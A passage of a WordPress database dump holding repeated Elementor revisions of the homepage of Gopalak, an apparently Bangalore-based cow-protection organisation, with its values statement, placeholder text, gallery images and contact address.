/></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 15:22:29','2022-10-11 09:52:29','',1373,'https://gopalak.in/?p=1639',0,'revision','',0),(1640,1,'2022-10-11 15:22:30','2022-10-11 09:52:30','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 15:22:30','2022-10-11 09:52:30','',1373,'https://gopalak.in/?p=1640',0,'revision','',0),(1642,1,'2022-10-11 18:00:15','2022-10-11 12:30:15','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 18:00:15','2022-10-11 12:30:15','',1373,'https://gopalak.in/?p=1642',0,'revision','',0),(1643,1,'2022-10-11 18:00:15','2022-10-11 12:30:15','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 18:00:15','2022-10-11 12:30:15','',1373,'https://gopalak.in/?p=1643',0,'revision','',0),(1644,1,'2022-10-11 18:00:15','2022-10-11 12:30:15','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img 